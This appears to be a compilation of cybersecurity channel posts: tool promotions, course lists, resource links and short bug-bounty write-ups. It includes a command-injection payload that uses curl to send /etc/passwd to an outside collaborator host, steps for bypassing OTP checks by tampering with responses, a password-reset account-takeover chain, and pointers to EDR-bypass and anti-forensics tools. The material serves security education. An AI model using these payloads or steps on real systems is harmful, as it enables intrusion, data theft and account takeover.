🦑One of the visualization tools that can help in detecting anomalies in large amounts of data that you may not know!

If you are in the cybersecurity field, you know the importance of analyzing large volumes of log data.. 😮‍💨

This tool is an open-source visualization software designed to interactively explore and understand massive amounts of tabular data!

𝐒𝐪𝐮𝐞𝐲

🔹It gives users an detailed yet intuitive multi-view representation of column-oriented data and can ingest from:
- Structured text files (CSV, logs, ...)
- Apache Parquet files
- Pcap files
- SQL databases
- Elasticsearch databases

🔹 It delivers value through its VISU approach:
- Visualize: Leverage various visual representations of raw data in combination with statistics.
- Investigate: Use filters to build an accurate understanding of millions of rows while switching instantly between capturing the big picture and focusing on the details.
- Spot the Unknown: As a structured understanding of the data emerges, identify unknowns and anomalies.

🔹 It can be used for many different purposes, such as:
Cybersecurity (to detect attacks and data leaks), BI and Big Data, IT troubleshooting, and Machine Learning.

🔗 To download: squey[.]org/download/
🔗 Documentation: doc[.]squey[.]org

🔴 If you want my advice, I would recommend installing it and solve a network forensics (PCAP file) challenge, to have an idea about it first 😉

🔴Note: To install it on Windows, you need to have installed and enabled WSL2.

Ref: Shbib
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2025 FREE Certification Courses!

No Fee, No Subscription, No Registration Required, Just Start Learning.
These Courses Includes Video Lectures, Tutorial and Easy Notes.
All courses are from the Microsoft Learn platform.
Microsoft Learn
.

1-Microsoft Azure Administrator
- Course AZ-104T00
- Course Link: https://lnkd.in/dUEGRTgq

2-Configuring and Operating Microsoft Azure Virtual Desktop
- Course AZ-140
- Course Link: https://lnkd.in/dWCUPjTC

3-Designing Microsoft Azure Infrastructure Solutions
- Course AZ-305T00
- Course Link: https://lnkd.in/dmvHyJ_z

4-Developing Solutions for Microsoft Azure
- Course AZ-204T00
- Course Link:https://lnkd.in/dtfBZBN6

5-Designing and Implementing Microsoft DevOps solutions
- Course AZ-400T00
- Course Link:https://lnkd.in/drCiHKgM

6-Designing and Implementing a Microsoft Azure AI Solution
- Course AI-102T00
- Course Link: https://lnkd.in/ducvr87J

7-Develop Generative AI Solutions with Azure OpenAI Service
- Course AI-050T00
- Course Link: https://lnkd.in/dJFW_PgR

8- Microsoft Security, Compliance, and Identity Fundamentals
- Course SC-900T00
- Course Link: https://lnkd.in/dRgx4EKG

9- Data Engineering on Microsoft Azure
- Course DP-203T00
- Course Link: https://lnkd.in/dSU6QmgT

10-Microsoft Security Operations Analyst
- Course SC-200T00
- Course Link: https://lnkd.in/d2EYRJph

11- Designing and Implementing Microsoft Azure Networking Solutions
- Course AZ-700T00
- Course Link: https://lnkd.in/dhDBjPaK

12-Designing and implementing a data science solution on Azure
- Course DP-100T01
- Course Link: https://lnkd.in/dUsB4GS6

13-Administering Microsoft Azure SQL Solutions
- Course DP-300T00
- Course Link:https://lnkd.in/d-5CzTDz

14-Microsoft Cybersecurity Architect
- Course SC-100T00
- Course Link: https://lnkd.in/dRhNSNsQ

15-Microsoft Azure Security Technologies
- Course AZ-500T00
- Course Link:https://lnkd.in/dPARyEZB

16-Azure Support Engineer Troubleshooting Azure Connectivity
- Course AZ-720T00
- Course Link: https://lnkd.in/d87-6RmC

17-Administering Windows Server Hybrid Core Infrastructure
- Course AZ-800T00
- Course Link:https://lnkd.in/dimC-puE

18-Configuring Windows Server Hybrid Advanced Services
- Course AZ-801T00
-Course Link:https://lnkd.in/dmXNAtP5

Ref: Shahzad MS
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Bypassing CrowdStrike EDR with Hookchain and Custom Shellcode 🚨

🔍 Key Points:
- Utilizing the Hookchain technique for evasion of detection.
- Designing custom shellcode for discreet execution.
- Illustrating the necessity for robust detection methods surpassing traditional EDR capabilities.

This experiment sheds light on critical vulnerabilities that sophisticated attackers could exploit, emphasizing the significance of embracing multi-layered security approaches.

🛡️ Disclaimer: This exploration serves solely for educational purposes, aiming to deepen comprehension of EDR bypass strategies for enhanced defense mechanisms. The primary objective? Strengthening cybersecurity infrastructures.

Ref: Ammar. A
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Broken Access Control: From Password Reset to Mass Account Takeover

A critical vulnerability in the password reset functionality of an API endpoint (/api/u/resetPwd). Here’s how it unfolded:

1️⃣ The endpoint accepts a username parameter and sends a password reset link to the user's email.
2️⃣ The use of "u" in the endpoint (u=user) hinted that other roles like admin (a=admin) or superuser (su) might exist.
3️⃣ Attempts to reset admin passwords via /api/admin/resetPwd and /api/administrator/resetPwd failed.
4️⃣ However, /api/su/resetPwd worked, allowing me to reset the superuser password!
5️⃣ The reset mechanism generated predictable passwords like username + ab12*. For example, resetting for admin resulted in adminab12*.

🎯 Impact: This flaw allowed unauthorized access to critical accounts, leading to mass account takeover.

Ref: Amit Kumar
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Anti Forensic Techniques Repositories #1

Anti Forensic Techniques
https://lnkd.in/dWmF3ikg

Awesome Anti Forensic by Shadawck
https://lnkd.in/dm2MFpV6

Anti Forensic Techniques by Hacktricks
https://lnkd.in/dimT7PJb

Windows Anti Forensic Script by MikeHorn
https://lnkd.in/d2h39Kg2

Anti Forensic Detection Tool by kuritsutianu
https://lnkd.in/dq4-7T9m

Anti Forensics Tool For Red Teamers by PaulNorman01
https://lnkd.in/d9A7t_Tx

AntiForensic.NET :: Windows anti-forensics made easy by hsheric0210
https://lnkd.in/dMsRJRYR

Anti Forensic Study by CCDCOE
https://lnkd.in/djhFgdqz

Ref: Joas A Santos
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Awesome Security - A collection of awesome software, libraries, documents, books, and resources about security.

🔗https://lnkd.in/dGb2hzyY
Awesome Web Security - Web Security materials and resources for cutting-edge penetration techniques.

🔗https://lnkd.in/d3kxd9ik

⭕️Awesome Machine Learning for Cyber Security Tools and resources on machine learning for cybersecurity.

🔗https://lnkd.in/dZPtJmXV

⭕️awesome-web-hacking - Resources for learning about web application security.

🔗https://lnkd.in/dqmeXsgj

⭕️awesome-mobile-security - Maintained by @vaib25vicky with contributions from the security and developer communities.

🔗https://lnkd.in/dbbvfeYT

⭕️awesome-threat-intelligence - A curated list of awesome Threat Intelligence resources.

🔗https://lnkd.in/dSPyZAQn
awesome-security-hardening - Collection of security hardening guides, best practices, and tools.

🔗https://lnkd.in/de_PyRxH
security-hardening

⭕️Awesome Cyber Security - A collection of software, libraries, documents, and resources about security.

🔗https://lnkd.in/dXztUHKk

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑OTP Bypass on Register account via Response manipulation:

1. First Method
1. Register account with mobile number and request for OTP.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be
{"verificationStatus": false, "mobile": 9072346577", "profileld": "84673832"}
5. Change this response to
{"verificationStatus": true, "mobile": 9072346577", "profileId": "84673832" }
6. And forward the response.
7. You will be logged in to the account.

Impact: Account Takeover

2. Second Method.
1. Go to login and wait for OTP pop up.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be <error>
5. Change this response to
success
6. And forward the response.

Ref: Het Vikam
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Bypass Login Prompts on Instagram & Pinterest! #OSINT

🔍 #OSINT Protip 9 by KartikHunt3r:
If you didn’t know about this trick before, you should now! There’s a simple way to bypass the login prompt when scrolling through an Instagram profile. This technique also works with Pinterest.

📌 Protip: By using this method, you can view profiles and posts without needing to log in, saving time and keeping your research anonymous.

💡 This can be incredibly useful for OSINT investigations when you want to gather public data without the need for creating accounts or logging in.
Stay tuned for more helpful tips in my #OSINT Series—enhancing your digital investigation skills! 🚀

💬 Found this tip helpful? Like, share, and follow for more OSINT hacks!

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 They may patch this for Instagram at any time, but this tip can be used for many other websites.

🦑Live Bug Bounty :

Welcome to HackWithRohit, your go-to channel for bug bounty and cybersecurity insights! 🌟 In today’s video, we’re diving deep into an advanced vulnerability chain: Reverse Tabnabbing leading to Cross-Site Scripting (XSS).

🌟 What You’ll Learn in This Video
1️⃣ What is Reverse Tabnabbing?
Explore how attackers manipulate the target="_blank" attribute to take control of a user's previously trusted page.
Understand how this technique works and its implications.
2️⃣ How Does It Lead to XSS?
Step-by-step walkthrough of leveraging Reverse Tabnabbing to inject malicious scripts.
Real-world example: Injecting an XSS payload through hijacked pages.

Ref: Rohith S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑POC steps:
01: I visit my target, I see my target, and I send a POST request to /v1/api HTTP/1.

02: I add this for getting the server location and other information. I replace with my Burp collaborator:

action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+https://lnkd.in/dyhGdqi2)

04: After sending the request, I see the response: "return":false,"reason":"Syntax error!"

05: In Burp collaborator, I can see the server's /etc/passwd file.

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑𝐅𝐑𝐄𝐄 𝐑𝐄𝐒𝐎𝐔𝐑𝐂𝐄𝐒 - 𝐁𝐋𝐀𝐂𝐊 𝐇𝐈𝐋𝐋𝐒 𝐈𝐍𝐅𝐎𝐑𝐌𝐀𝐓𝐈𝐎𝐍 𝐒𝐄𝐂𝐔𝐑𝐈𝐓𝐘

Check out Black Hills Information Security for top-notch cybersecurity content created by experts in the field. Their informative and engaging videos cover a range of topics, from the latest threats and vulnerabilities to strategies for protecting your systems and data.

👉 𝗕𝗨𝗜𝗟𝗗 𝗬𝗢𝗨𝗥 𝗛𝗢𝗠𝗘 𝗟𝗔𝗕
🌟 How to Build a Home Lab for Infosec - Ralph May
http://ow.ly/ynS650NKLlS

👉 𝗡𝗘𝗧𝗪𝗢𝗥𝗞 𝗦𝗘𝗖𝗨𝗥𝗜𝗧𝗬
🌟 Networking for Pentesters: Beginner - Serena D.
http://ow.ly/CpgS50NKLlZ

👉 𝗣𝗘𝗡𝗧𝗘𝗦𝗧𝗜𝗡𝗚
🌟 Introduction to Pentesting - Mike Felch
http://ow.ly/RVWX50NKLm0

🌟 Pentester Tactics, Techniques, and Procedures TTPs - Chris Traynor
http://ow.ly/BnMK50NKLlK

👉 𝗪𝗘𝗕 𝗔𝗣𝗣𝗟𝗜𝗖𝗔𝗧𝗜𝗢𝗡 𝗔𝗡𝗗 𝗕𝗨𝗥𝗣 𝗦𝗨𝗜𝗧𝗘
🌟 Getting Started with Burp Suite & Webapp Pentesting - BB King
http://ow.ly/7yv750NKLlP

🌟 Modern Webapp Pentesting: How to Attack a JWT - BB King
http://ow.ly/F37650NKLlQ

🌟 Basics of Burp(ing) for Testing Web App Security - Chris Traynor
http://ow.ly/nvMO50NKLlW

👉 𝗜𝗠𝗣𝗥𝗢𝗩𝗘 𝗬𝗢𝗨𝗥 𝗣𝗘𝗡𝗧𝗘𝗦𝗧 𝗥𝗘𝗣𝗢𝗥𝗧𝗦
🌟 Things NOT to Do in Pentest Reports - Bronwen Aker
http://ow.ly/g3KP50NKLlV

👉 𝗥𝗘𝗗 𝗧𝗘𝗔𝗠𝗜𝗡𝗚
🌟 Atomic Red Team Hands on Getting Started Guide - Carrie & Darin Roberts
http://ow.ly/mzfG50NKLm2

🌟 OPSEC Fundamentals for Remote Red Teams - Michael Allen
http://ow.ly/sni250NKLlN

👉 𝗖𝗟𝗢𝗨𝗗 𝗣𝗘𝗡𝗧𝗘𝗦𝗧
🌟 Get your head in the Clouds - Sean Verity
http://ow.ly/m4aM50NKLlI

🌟 Azure Console Pivoting 101 - Stephen Borosh
http://ow.ly/foGR50NKLlJ

🌟 Securing AWS Discover Cloud Vulnerabilities - Beau Bullock
http://ow.ly/pUyH50NKLlY

👉 𝗪𝗘𝗕𝟯
🌟 Getting Started in Blockchain Security and Smart Contract Auditing - Beau Bullock
http://ow.ly/YSLC50NKLlO

🌟 Demystifying Web3 Attack Vectors - Beau Bullock & Steve Borosh
http://ow.ly/sWrv50NKLlT

👉 𝗝𝗢𝗕 𝗛𝗨𝗡𝗧𝗜𝗡𝗚
🌟 How to Hunt for Jobs like a Hacker - Jason Blanchard
http://ow.ly/pzik50NKLlX

🌟 Infosec Job Hunting (Part 1)
http://ow.ly/4THW50NKLm1

👉 𝗕𝗢𝗡𝗨𝗦
🌟 Have fun with the PROMPT# Zines
http://ow.ly/BYt450NKLlU

Post Credit : Gabrielle
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The Ultimate IDOR Testing Checklist!

Are you testing for Insecure Direct Object References (IDOR) vulnerabilities? Here's a detailed checklist to ensure nothing slips through the cracks.

This comprehensive list covers everything from:
✅ Testing parameter pollution
✅ Exploring API versions and extensions
✅ Swapping GUIDs with numeric IDs
✅ Bypassing 403/401 responses
✅ Blind IDORs and chaining with XSS for account takeovers

Whether you're a bug bounty hunter, pentester, or security enthusiast, this checklist will help you uncover those hidden vulnerabilities and secure applications effectively.

Ref: Amit Kumar
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑"Interview Simulation For Cybersecurity Analyst Position (L1, L2, L3) From Various Background Complete With ATS Resume Examples". In this document, I have prepared six different career backgrounds for individuals seeking a cybersecurity analyst role, whether they are transitioning from another field or moving from L1 to L2 or L3 positions. Additionally, I have provided interview simulations for each job application, along with tailored ATS-optimised resumes.

🦑User Automation Process Using CSV:

1- Create the CSV Script
Begin by creating a CSV file with the following headers:
{DN,ObjectClass,SamAccountName,UserPrincipalName,Description,UserAccountName,DisplayName}
2- Fill in the Data
Below the headers, enter the required user details. Each line should represent a user in this format:
{"CN=User1,OU=IT,DC=company,DC=com",user,User1,user1@company.com,"IT Specialist","User1",514,"User One"
"CN=User2,OU=Sales,DC=company,DC=com",user,User2,user2@company.com,"Sales Representative","User2",514,"User Two"}
3- Save the File
Once all user data is filled in, save the file with a .csv extension
Example filename: users.csv
4- Import the Users
To import the users, open PowerShell and run the following command
{csvde -i -f "C:\path\to\your\users.csv"}
5- Enable the Accounts
After importing, all accounts will be disabled by default. To enable them:
Reset their passwords.
Use PowerShell commands to enable the accounts.

Mossad Hamady
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Ngrok – Simplified Tunneling.

ngrok is a game-changing tool that bridges the gap between your local machine and the online world by exposing local servers to the internet through secure tunnels.

🔑 What Makes Ngrok a Must-Have Tool?

1️⃣ Simplified Local Tunneling
Ngrok allows you to expose a local server to the internet in seconds. Say goodbye to complex port forwarding configurations or NAT headaches.

2️⃣ Secure Tunnels
With built-in TLS encryption, Ngrok ensures your data travels securely between endpoints. No more worrying about unencrypted connections when demonstrating or testing sensitive applications.

3️⃣ Dynamic Subdomains
Easily share your application with temporary, unique URLs that expire after use. Perfect for one-time demos or testing.

4️⃣ Webhook Testing Made Easy
Debugging webhook integrations has never been simpler. Ngrok allows you to view detailed request logs and replay them for testing.

5️⃣ Remote Collaboration
Showcase your development or simulations to remote teams without deploying to production. Whether it’s a cybersecurity simulation or an app prototype, Ngrok is your go-to solution.

🔧 How to Get Started with Ngrok

1️⃣ Install Ngrok

Download and install Ngrok from the official website:
👉 https:// ngrok.com /download

For Linux, run:

sudo apt install ngrok

2️⃣ Sign Up for Free or Pro Plan

Ngrok’s free plan offers basic tunneling, while the Pro plan unlocks advanced features like custom subdomains and reserved addresses.

3️⃣ Expose Your Local Server

Run your local app (e.g., on port 5000):

python -m http.server 5000

Start the Ngrok tunnel:

ngrok http 5000

Ngrok will generate a public URL (e.g., https://1234.ngrok.io) that maps to your local server. Share this URL to let others access your app!

🌍 When You Need a Public IP

Ngrok is great for quick and easy access to your local applications, but for real-world penetration testing, you’ll eventually need a dedicated public IP address for activities like remote shell connections or long-term access.

Personally, I use AWS servers to run my virtual machines with public IP addresses. AWS provides an ideal environment for hosting pentesting tools, enabling you to maintain persistent access during engagements.

For example:

• If you’re delivering a reverse shell, having a public IP is crucial to ensure the shell connects back to your system.
• AWS Elastic IPs make it easy to assign a static public IP, which is highly reliable for pentesting setups.

Have you used AWS servers or Ngrok in your pentesting or development setups? 🚀

Andrew P.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁